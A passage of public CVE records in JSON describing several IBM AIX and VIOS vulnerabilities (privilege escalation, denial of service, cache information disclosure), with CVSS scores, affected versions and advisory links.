"x_refsource_OSVDB", "x_transferred" ], "url": "http://osvdb.org/95419" }, { "name": "IV43561", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR", "x_transferred" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV43561" }, { "name": "95420", "tags": [ "vdb-entry", "x_refsource_OSVDB", "x_transferred" ], "url": "http://osvdb.org/95420" }, { "name": "IV43582", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR", "x_transferred" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV43582" }, { "name": "IV43756", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR", "x_transferred" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV43756" }, { "name": "61287", "tags": [ "vdb-entry", "x_refsource_BID", "x_transferred" ], "url": "http://www.securityfocus.com/bid/61287" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "datePublic": "2013-07-16T00:00:00", "descriptions": [ { "lang": "en", "value": "Multiple unspecified vulnerabilities in the InfiniBand subsystem in IBM AIX 6.1 and 7.1, and VIOS 2.2.2.2-FP-26 SP-02, allow local users to gain privileges via vectors involving (1) arp.ib or (2) ibstat." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2017-09-18T12:57:01", "orgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "shortName": "ibm" }, "references": [ { "name": "54215", "tags": [ "third-party-advisory", "x_refsource_SECUNIA" ], "url": "http://secunia.com/advisories/54215" }, { "name": "IV43562", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV43562" }, { "name": "1028792", "tags": [ "vdb-entry", "x_refsource_SECTRACK" ], "url": "http://www.securitytracker.com/id/1028792" }, { "name": "aix-cve20134011-infiniband(85617)", "tags": [ "vdb-entry", "x_refsource_XF" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/85617" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "http://aix.software.ibm.com/aix/efixes/security/infiniband_advisory.asc" }, { "name": "IV43580", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV43580" }, { "name": "oval:org.mitre.oval:def:19167", "tags": [ "vdb-entry", "signature", "x_refsource_OVAL" ], "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A19167" }, { "name": "IV43827", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV43827" }, { "name": "95419", "tags": [ "vdb-entry", "x_refsource_OSVDB" ], "url": "http://osvdb.org/95419" }, { "name": "IV43561", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV43561" }, { "name": "95420", "tags": [ "vdb-entry", "x_refsource_OSVDB" ], "url": "http://osvdb.org/95420" }, { "name": "IV43582", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV43582" }, { "name": "IV43756", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV43756" }, { "name": "61287", "tags": [ "vdb-entry", "x_refsource_BID" ], "url": "http://www.securityfocus.com/bid/61287" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "psirt@us.ibm.com", "ID": "CVE-2013-4011", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "n/a", "version": { "version_data": [ { "version_value": "n/a" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "Multiple unspecified vulnerabilities in the InfiniBand subsystem in IBM AIX 6.1 and 7.1, and VIOS 2.2.2.2-FP-26 SP-02, allow local users to gain privileges via vectors involving (1) arp.ib or (2) ibstat." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "n/a" } ] } ] }, "references": { "reference_data": [ { "name": "54215", "refsource": "SECUNIA", "url": "http://secunia.com/advisories/54215" }, { "name": "IV43562", "refsource": "AIXAPAR", "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV43562" }, { "name": "1028792", "refsource": "SECTRACK", "url": "http://www.securitytracker.com/id/1028792" }, { "name": "aix-cve20134011-infiniband(85617)", "refsource": "XF", "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/85617" }, { "name": "http://aix.software.ibm.com/aix/efixes/security/infiniband_advisory.asc", "refsource": "CONFIRM", "url": "http://aix.software.ibm.com/aix/efixes/security/infiniband_advisory.asc" }, { "name": "IV43580", "refsource": "AIXAPAR", "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV43580" }, { "name": "oval:org.mitre.oval:def:19167", "refsource": "OVAL", "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A19167" }, { "name": "IV43827", "refsource": "AIXAPAR", "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV43827" }, { "name": "95419", "refsource": "OSVDB", "url": "http://osvdb.org/95419" }, { "name": "IV43561", "refsource": "AIXAPAR", "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV43561" }, { "name": "95420", "refsource": "OSVDB", "url": "http://osvdb.org/95420" }, { "name": "IV43582", "refsource": "AIXAPAR", "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV43582" }, { "name": "IV43756", "refsource": "AIXAPAR", "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV43756" }, { "name": "61287", "refsource": "BID", "url": "http://www.securityfocus.com/bid/61287" } ] } } } }, "cveMetadata": { "assignerOrgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "assignerShortName": "ibm", "cveId": "CVE-2013-4011", "datePublished": "2013-07-18T16:00:00", "dateReserved": "2013-06-07T00:00:00", "dateUpdated": "2024-08-06T16:30:49.435Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2021-38989
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://www.ibm.com/support/pages/node/6561277 | x_refsource_CONFIRM | |
https://exchange.xforce.ibmcloud.com/vulnerabilities/212951 | vdb-entry, x_refsource_XF |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-04T01:58:16.517Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "https://www.ibm.com/support/pages/node/6561277" }, { "name": "ibm-aix-cve202138989-dos (212951)", "tags": [ "vdb-entry", "x_refsource_XF", "x_transferred" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/212951" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "VIOS", "vendor": "IBM", "versions": [ { "status": "affected", "version": "3.1" } ] }, { "product": "AIX", "vendor": "IBM", "versions": [ { "status": "affected", "version": "7.1" }, { "status": "affected", "version": "7.2" }, { "status": "affected", "version": "7.3" } ] } ], "datePublic": "2022-03-04T00:00:00", "descriptions": [ { "lang": "en", "value": "IBM AIX 7.1, 7.2, 7.3, and VIOS 3.1 could allow a non-privileged local user to exploit a vulnerability in the AIX kernel to cause a denial of service. IBM X-Force ID: 212951." } ], "metrics": [ { "cvssV3_0": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 6.2, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "exploitCodeMaturity": "UNPROVEN", "integrityImpact": "NONE", "privilegesRequired": "NONE", "remediationLevel": "OFFICIAL_FIX", "reportConfidence": "CONFIRMED", "scope": "UNCHANGED", "temporalScore": 5.4, "temporalSeverity": "MEDIUM", "userInteraction": "NONE", "vectorString": "CVSS:3.0/C:N/I:N/UI:N/AC:L/PR:N/A:H/AV:L/S:U/RL:O/E:U/RC:C", "version": "3.0" } } ], "problemTypes": [ { "descriptions": [ { "description": "Denial of Service", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2022-03-07T16:55:15", "orgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "shortName": "ibm" }, "references": [ { "tags": [ "x_refsource_CONFIRM" ], "url": "https://www.ibm.com/support/pages/node/6561277" }, { "name": "ibm-aix-cve202138989-dos (212951)", "tags": [ "vdb-entry", "x_refsource_XF" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/212951" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "psirt@us.ibm.com", "DATE_PUBLIC": "2022-03-04T00:00:00", "ID": "CVE-2021-38989", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "VIOS", "version": { "version_data": [ { "version_value": "3.1" } ] } }, { "product_name": "AIX", "version": { "version_data": [ { "version_value": "7.1" }, { "version_value": "7.2" }, { "version_value": "7.3" } ] } } ] }, "vendor_name": "IBM" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "IBM AIX 7.1, 7.2, 7.3, and VIOS 3.1 could allow a non-privileged local user to exploit a vulnerability in the AIX kernel to cause a denial of service. IBM X-Force ID: 212951." } ] }, "impact": { "cvssv3": { "BM": { "A": "H", "AC": "L", "AV": "L", "C": "N", "I": "N", "PR": "N", "S": "U", "UI": "N" }, "TM": { "E": "U", "RC": "C", "RL": "O" } } }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "Denial of Service" } ] } ] }, "references": { "reference_data": [ { "name": "https://www.ibm.com/support/pages/node/6561277", "refsource": "CONFIRM", "title": "IBM Security Bulletin 6561277 (AIX)", "url": "https://www.ibm.com/support/pages/node/6561277" }, { "name": "ibm-aix-cve202138989-dos (212951)", "refsource": "XF", "title": "X-Force Vulnerability Report", "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/212951" } ] } } } }, "cveMetadata": { "assignerOrgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "assignerShortName": "ibm", "cveId": "CVE-2021-38989", "datePublished": "2022-03-07T16:55:15.684129Z", "dateReserved": "2021-08-16T00:00:00", "dateUpdated": "2024-09-17T02:41:58.321Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2022-43849
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://www.ibm.com/support/pages/node/6847947 | vendor-advisory | |
https://exchange.xforce.ibmcloud.com/vulnerabilities/239170 | vdb-entry |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T13:40:06.627Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://www.ibm.com/support/pages/node/6847947" }, { "tags": [ "vdb-entry", "x_transferred" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/239170" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "defaultStatus": "unaffected", "product": "AIX", "vendor": "IBM", "versions": [ { "status": "affected", "version": "7.1, 7.2, 7.3, VIOS 3.1" } ] } ], "descriptions": [ { "lang": "en", "supportingMedia": [ { "base64": false, "type": "text/html", "value": "IBM AIX 7.1, 7.2, 7.3, and VIOS 3.1could allow a non-privileged local user to exploit a vulnerability in the AIX pfcdd kernel extension to cause a denial of service. IBM X-Force ID: 239170." } ], "value": "IBM AIX 7.1, 7.2, 7.3, and VIOS 3.1could allow a non-privileged local user to exploit a vulnerability in the AIX pfcdd kernel extension to cause a denial of service. IBM X-Force ID: 239170." } ], "metrics": [ { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 6.2, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "format": "CVSS", "scenarios": [ { "lang": "en", "value": "GENERAL" } ] } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-20", "description": "CWE-20 Improper Input Validation", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2022-12-23T19:16:19.688Z", "orgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "shortName": "ibm" }, "references": [ { "tags": [ "vendor-advisory" ], "url": "https://www.ibm.com/support/pages/node/6847947" }, { "tags": [ "vdb-entry" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/239170" } ], "source": { "discovery": "UNKNOWN" }, "title": "IBM AIX denial of service", "x_generator": { "engine": "Vulnogram 0.1.0-dev" } } }, "cveMetadata": { "assignerOrgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "assignerShortName": "ibm", "cveId": "CVE-2022-43849", "datePublished": "2022-12-23T19:16:19.688Z", "dateReserved": "2022-10-26T15:46:22.822Z", "dateUpdated": "2024-08-03T13:40:06.627Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2020-4788
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://www.ibm.com/support/pages/node/6370729 | x_refsource_CONFIRM | |
https://exchange.xforce.ibmcloud.com/vulnerabilities/189296 | vdb-entry, x_refsource_XF | |
http://www.openwall.com/lists/oss-security/2020/11/20/3 | mailing-list, x_refsource_MLIST | |
http://www.openwall.com/lists/oss-security/2020/11/23/1 | mailing-list, x_refsource_MLIST | |
https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ZF4OGZPKTAJJXWHPIFP3LHEWWEMR5LPT/ | vendor-advisory, x_refsource_FEDORA | |
https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/TITJQPYDWZ4NB2ONJWUXW75KSQIPF35T/ | vendor-advisory, x_refsource_FEDORA | |
https://www.oracle.com/security-alerts/cpujul2022.html | x_refsource_MISC |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-04T08:14:57.937Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "https://www.ibm.com/support/pages/node/6370729" }, { "name": "ibm-i-cve20204788-info-disc (189296)", "tags": [ "vdb-entry", "x_refsource_XF", "x_transferred" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/189296" }, { "name": "[oss-security] 20201120 CVE-2020-4788: Speculation on incompletely validated data on IBM Power9", "tags": [ "mailing-list", "x_refsource_MLIST", "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2020/11/20/3" }, { "name": "[oss-security] 20201123 Re: CVE-2020-4788: Speculation on incompletely validated data on IBM Power9", "tags": [ "mailing-list", "x_refsource_MLIST", "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2020/11/23/1" }, { "name": "FEDORA-2020-4700a73bd5", "tags": [ "vendor-advisory", "x_refsource_FEDORA", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ZF4OGZPKTAJJXWHPIFP3LHEWWEMR5LPT/" }, { "name": "FEDORA-2020-8c15928d23", "tags": [ "vendor-advisory", "x_refsource_FEDORA", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/TITJQPYDWZ4NB2ONJWUXW75KSQIPF35T/" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://www.oracle.com/security-alerts/cpujul2022.html" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "VIOS", "vendor": "IBM", "versions": [ { "status": "affected", "version": "3.1" } ] }, { "product": "AIX", "vendor": "IBM", "versions": [ { "status": "affected", "version": "7.1" }, { "status": "affected", "version": "7.2" } ] } ], "datePublic": "2020-11-19T00:00:00", "descriptions": [ { "lang": "en", "value": "IBM Power9 (AIX 7.1, 7.2, and VIOS 3.1) processors could allow a local user to obtain sensitive information from the data in the L1 cache under extenuating circumstances. IBM X-Force ID: 189296." } ], "metrics": [ { "cvssV3_0": { "attackComplexity": "HIGH", "attackVector": "LOCAL", "availabilityImpact": "NONE", "baseScore": 5.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "exploitCodeMaturity": "UNPROVEN", "integrityImpact": "NONE", "privilegesRequired": "NONE", "remediationLevel": "OFFICIAL_FIX", "reportConfidence": "CONFIRMED", "scope": "UNCHANGED", "temporalScore": 4.5, "temporalSeverity": "MEDIUM", "userInteraction": "NONE", "vectorString": "CVSS:3.0/PR:N/C:H/AV:L/AC:H/S:U/A:N/I:N/UI:N/E:U/RC:C/RL:O", "version": "3.0" } } ], "problemTypes": [ { "descriptions": [ { "description": "Obtain Information", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2022-07-25T16:22:49", "orgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "shortName": "ibm" }, "references": [ { "tags": [ "x_refsource_CONFIRM" ], "url": "https://www.ibm.com/support/pages/node/6370729" }, { "name": "ibm-i-cve20204788-info-disc (189296)", "tags": [ "vdb-entry", "x_refsource_XF" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/189296" }, { "name": "[oss-security] 20201120 CVE-2020-4788: Speculation on incompletely validated data on IBM Power9", "tags": [ "mailing-list", "x_refsource_MLIST" ], "url": "http://www.openwall.com/lists/oss-security/2020/11/20/3" }, { "name": "[oss-security] 20201123 Re: CVE-2020-4788: Speculation on incompletely validated data on IBM Power9", "tags": [ "mailing-list", "x_refsource_MLIST" ], "url": "http://www.openwall.com/lists/oss-security/2020/11/23/1" }, { "name": "FEDORA-2020-4700a73bd5", "tags": [ "vendor-advisory", "x_refsource_FEDORA" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ZF4OGZPKTAJJXWHPIFP3LHEWWEMR5LPT/" }, { "name": "FEDORA-2020-8c15928d23", "tags": [ "vendor-advisory", "x_refsource_FEDORA" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/TITJQPYDWZ4NB2ONJWUXW75KSQIPF35T/" }, { "tags": [ "x_refsource_MISC" ], "url": "https://www.oracle.com/security-alerts/cpujul2022.html" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "psirt@us.ibm.com", "DATE_PUBLIC": "2020-11-19T00:00:00", "ID": "CVE-2020-4788", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "VIOS", "version": { "version_data": [ { "version_value": "3.1" } ] } }, { "product_name": "AIX", "version": { "version_data": [ { "version_value": "7.1" }, { "version_value": "7.2" } ] } } ] }, "vendor_name": "IBM" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "IBM Power9 (AIX 7.1, 7.2, and VIOS 3.1) processors could allow a local user to obtain sensitive information from the data in the L1 cache under extenuating circumstances. IBM X-Force ID: 189296." } ] }, "impact": { "cvssv3": { "BM": { "A": "N", "AC": "H", "AV": "L", "C": "H", "I": "N", "PR": "N", "S": "U", "UI": "N" }, "TM": { "E": "U", "RC": "C", "RL": "O" } } }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "Obtain Information" } ] } ] }, "references": { "reference_data": [ { "name": "https://www.ibm.com/support/pages/node/6370729", "refsource": "CONFIRM", "title": "IBM Security Bulletin 6370729 (AIX)", "url": "https://www.ibm.com/support/pages/node/6370729" }, { "name": "ibm-i-cve20204788-info-disc (189296)", "refsource": "XF", "title": "X-Force Vulnerability Report", "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/189296" }, { "name": "[oss-security] 20201120 CVE-2020-4788: Speculation on incompletely validated data on IBM Power9", "refsource": "MLIST", "url": "http://www.openwall.com/lists/oss-security/2020/11/20/3" }, { "name": "[oss-security] 20201123 Re: CVE-2020-4788: Speculation on incompletely validated data on IBM Power9", "refsource": "MLIST", "url": "http://www.openwall.com/lists/oss-security/2020/11/23/1" }, { "name": "FEDORA-2020-4700a73bd5", "refsource": "FEDORA", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZF4OGZPKTAJJXWHPIFP3LHEWWEMR5LPT/" }, { "name": "FEDORA-2020-8c15928d23", "refsource": "FEDORA", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TITJQPYDWZ4NB2ONJWUXW75KSQIPF35T/" }, { "name": "https://www.oracle.com/security-alerts/cpujul2022.html", "refsource": "MISC", "url": "https://www.oracle.com/security-alerts/cpujul2022.html" } ] } } } }, "cveMetadata": { "assignerOrgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "assignerShortName": "ibm", "cveId": "CVE-2020-4788", "datePublished": "2020-11-20T03:45:13.599036Z", "dateReserved": "2019-12-30T00:00:00", "dateUpdated": "2024-09-16T19:05:08.453Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2022-34356
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://www.ibm.com/support/pages/node/6619721 | x_refsource_CONFIRM | |
https://exchange.xforce.ibmcloud.com/vulnerabilities/230502 | vdb-entry, x_refsource_XF |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T09:07:16.254Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "https://www.ibm.com/support/pages/node/6619721" }, { "name": "ibm-aix-cve202234356-priv-escalation (230502)", "tags": [ "vdb-entry", "x_refsource_XF", "x_transferred" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/230502" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "VIOS", "vendor": "IBM", "versions": [ { "status": "affected", "version": "3.1" } ] }, { "product": "AIX", "vendor": "IBM", "versions": [ { "status": "affected", "version": "7.1" }, { "status": "affected", "version": "7.2" }, { "status": "affected", "version": "7.3" } ] } ], "datePublic": "2022-09-12T00:00:00", "descriptions": [ { "lang": "en", "value": "IBM AIX 7.1, 7.2, 7.3, and VIOS 3.1 could allow a non-privileged local user to exploit a vulnerability in the AIX kernel to obtain root privileges. IBM X-Force ID: 230502." } ], "metrics": [ { "cvssV3_0": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 8.4, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "exploitCodeMaturity": "UNPROVEN", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "remediationLevel": "OFFICIAL_FIX", "reportConfidence": "CONFIRMED", "scope": "UNCHANGED", "temporalScore": 7.3, "temporalSeverity": "HIGH", "userInteraction": "NONE", "vectorString": "CVSS:3.0/C:H/A:H/I:H/AV:L/UI:N/AC:L/S:U/PR:N/E:U/RC:C/RL:O", "version": "3.0" } } ], "problemTypes": [ { "descriptions": [ { "description": "Gain Privileges", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2022-09-13T20:45:26", "orgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "shortName": "ibm" }, "references": [ { "tags": [ "x_refsource_CONFIRM" ], "url": "https://www.ibm.com/support/pages/node/6619721" }, { "name": "ibm-aix-cve202234356-priv-escalation (230502)", "tags": [ "vdb-entry", "x_refsource_XF" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/230502" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "psirt@us.ibm.com", "DATE_PUBLIC": "2022-09-12T00:00:00", "ID": "CVE-2022-34356", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "VIOS", "version": { "version_data": [ { "version_value": "3.1" } ] } }, { "product_name": "AIX", "version": { "version_data": [ { "version_value": "7.1" }, { "version_value": "7.2" }, { "version_value": "7.3" } ] } } ] }, "vendor_name": "IBM" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "IBM AIX 7.1, 7.2, 7.3, and VIOS 3.1 could allow a non-privileged local user to exploit a vulnerability in the AIX kernel to obtain root privileges. IBM X-Force ID: 230502." } ] }, "impact": { "cvssv3": { "BM": { "A": "H", "AC": "L", "AV": "L", "C": "H", "I": "H", "PR": "N", "S": "U", "UI": "N" }, "TM": { "E": "U", "RC": "C", "RL": "O" } } }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "Gain Privileges" } ] } ] }, "references": { "reference_data": [ { "name": "https://www.ibm.com/support/pages/node/6619721", "refsource": "CONFIRM", "title": "IBM Security Bulletin 6619721 (AIX)", "url": "https://www.ibm.com/support/pages/node/6619721" }, { "name": "ibm-aix-cve202234356-priv-escalation (230502)", "refsource": "XF", "title": "X-Force Vulnerability Report", "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/230502" } ] } } } }, "cveMetadata": { "assignerOrgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "assignerShortName": "ibm", "cveId": "CVE-2022-34356", "datePublished": "2022-09-13T20:45:26.108001Z", "dateReserved": "2022-06-23T00:00:00", "dateUpdated": "2024-09-17T00:02:24.650Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2021-38990
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://www.ibm.com/support/pages/node/6515496 | x_refsource_CONFIRM | |
https://www.ibm.com/support/pages/node/6538700 | x_refsource_CONFIRM | |
https://exchange.xforce.ibmcloud.com/vulnerabilities/212952 | vdb-entry, x_refsource_XF |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-04T01:58:16.505Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "https://www.ibm.com/support/pages/node/6515496" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "https://www.ibm.com/support/pages/node/6538700" }, { "name": "ibm-aix-cve202138990-code-exec (212952)", "tags": [ "vdb-entry", "x_refsource_XF", "x_transferred" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/212952" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "AIX", "vendor": "IBM", "versions": [ { "status": "affected", "version": "7.1" }, { "status": "affected", "version": "7.2" } ] }, { "product": "VIOS", "vendor": "IBM", "versions": [ { "status": "affected", "version": "3.1" } ] } ], "datePublic": "2022-01-06T00:00:00", "descriptions": [ { "lang": "en", "value": "IBM AIX 7.1, 7.2, and VIOS 3.1 could allow a non-privileged local user to exploit a vulnerability in the mount command which could lead to code execution. IBM X-Force ID: 212952." } ], "metrics": [ { "cvssV3_0": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 8.4, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "exploitCodeMaturity": "UNPROVEN", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "remediationLevel": "OFFICIAL_FIX", "reportConfidence": "CONFIRMED", "scope": "UNCHANGED", "temporalScore": 7.3, "temporalSeverity": "HIGH", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:L/UI:N/PR:N/S:U/A:H/AC:L/C:H/I:H/E:U/RL:O/RC:C", "version": "3.0" } } ], "problemTypes": [ { "descriptions": [ { "description": "Gain Privileges", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2022-01-07T17:55:27", "orgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "shortName": "ibm" }, "references": [ { "tags": [ "x_refsource_CONFIRM" ], "url": "https://www.ibm.com/support/pages/node/6515496" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "https://www.ibm.com/support/pages/node/6538700" }, { "name": "ibm-aix-cve202138990-code-exec (212952)", "tags": [ "vdb-entry", "x_refsource_XF" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/212952" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "psirt@us.ibm.com", "DATE_PUBLIC": "2022-01-06T00:00:00", "ID": "CVE-2021-38990", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "AIX", "version": { "version_data": [ { "version_value": "7.1" }, { "version_value": "7.2" } ] } }, { "product_name": "VIOS", "version": { "version_data": [ { "version_value": "3.1" } ] } } ] }, "vendor_name": "IBM" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "IBM AIX 7.1, 7.2, and VIOS 3.1 could allow a non-privileged local user to exploit a vulnerability in the mount command which could lead to code execution. IBM X-Force ID: 212952." } ] }, "impact": { "cvssv3": { "BM": { "A": "H", "AC": "L", "AV": "L", "C": "H", "I": "H", "PR": "N", "S": "U", "UI": "N" }, "TM": { "E": "U", "RC": "C", "RL": "O" } } }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "Gain Privileges" } ] } ] }, "references": { "reference_data": [ { "name": "https://www.ibm.com/support/pages/node/6515496", "refsource": "CONFIRM", "title": "IBM Security Bulletin 6515496 (Security Key Lifecycle Manager)", "url": 